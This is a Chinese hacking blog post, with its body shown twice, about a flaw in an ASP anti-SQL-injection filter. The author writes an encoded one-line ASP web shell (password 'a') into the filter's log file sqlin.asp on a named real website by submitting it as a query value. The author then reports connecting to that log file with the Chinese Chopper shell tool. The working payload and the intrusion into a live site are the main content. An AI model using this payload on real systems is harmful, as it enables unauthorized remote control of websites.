SQL通用防注入系統(tǒng)asp版漏洞
發(fā)布時(shí)間:2012-05-15 11:15:08 作者:佚名
我要評(píng)論

今晚群里朋友叫看個(gè)站,有sql防注入,繞不過(guò),但是有發(fā)現(xiàn)記錄wrong的文件sqlin.asp。
今晚群里朋友叫看個(gè)站,有sql防注入,繞不過(guò),但是有發(fā)現(xiàn)記錄wrong的文件sqlin.asp。

既然做了記錄,再查看了下它的記錄文件

于是想著構(gòu)造個(gè)asp一句話寫(xiě)進(jìn)去,前面幾種沒(méi)加密的都失敗了,于是寫(xiě)了個(gè)加密的
┼攠數(shù)畣整爠煥敵瑳∨≡┩愾 密碼 a (加密方式是: ANSI->Unicode)
提交 and 1= ┼攠數(shù)畣整爠煥敵瑳∨≡┩愾

http://www.jnb1.net/sqlin.asp 菜刀連接之,成功

+----------------------------------------+
其實(shí)過(guò)程并不難,也沒(méi)什么技術(shù)難度,但是有時(shí)遇到這種記錄注入錯(cuò)誤的網(wǎng)站,多個(gè)便捷途徑還是不錯(cuò)的。還有,另外百度了下,發(fā)現(xiàn)半坑土農(nóng)民曾經(jīng)發(fā)現(xiàn)了類(lèi)似的,但是,額,去他博客看時(shí) , 瀑布汗


既然做了記錄,再查看了下它的記錄文件

于是想著構(gòu)造個(gè)asp一句話寫(xiě)進(jìn)去,前面幾種沒(méi)加密的都失敗了,于是寫(xiě)了個(gè)加密的
┼攠數(shù)畣整爠煥敵瑳∨≡┩愾 密碼 a (加密方式是: ANSI->Unicode)
提交 and 1= ┼攠數(shù)畣整爠煥敵瑳∨≡┩愾

http://www.jnb1.net/sqlin.asp 菜刀連接之,成功

+----------------------------------------+
其實(shí)過(guò)程并不難,也沒(méi)什么技術(shù)難度,但是有時(shí)遇到這種記錄注入錯(cuò)誤的網(wǎng)站,多個(gè)便捷途徑還是不錯(cuò)的。還有,另外百度了下,發(fā)現(xiàn)半坑土農(nóng)民曾經(jīng)發(fā)現(xiàn)了類(lèi)似的,但是,額,去他博客看時(shí) , 瀑布汗


相關(guān)文章
- sqlmap 是一個(gè)自動(dòng)SQL 射入工具。本文收集了一些利用Sqlmap做注入測(cè)試的TIPS,其中也包含一點(diǎn)繞WAF的技巧,便于大家集中查閱,歡迎接樓補(bǔ)充、分享。2014-07-29
- 近日,網(wǎng)站頻頻被黑。在網(wǎng)站里莫名其妙的多出一篇文 章,還有多出一組貼圖。正在納悶是誰(shuí)可以登陸我的后臺(tái)發(fā)表文章和圖片的時(shí)候,我的qq彈出消息,一個(gè)陌生人給我發(fā)消息,2012-09-28
- Structured Query Language即結(jié)構(gòu)化查詢語(yǔ)言,用于操作關(guān)系型數(shù)據(jù)庫(kù)管理系統(tǒng),本文給大家介紹SQL注入及危害、防御手段的處理方法,感興趣的朋友跟隨小編一起看看吧2022-10-10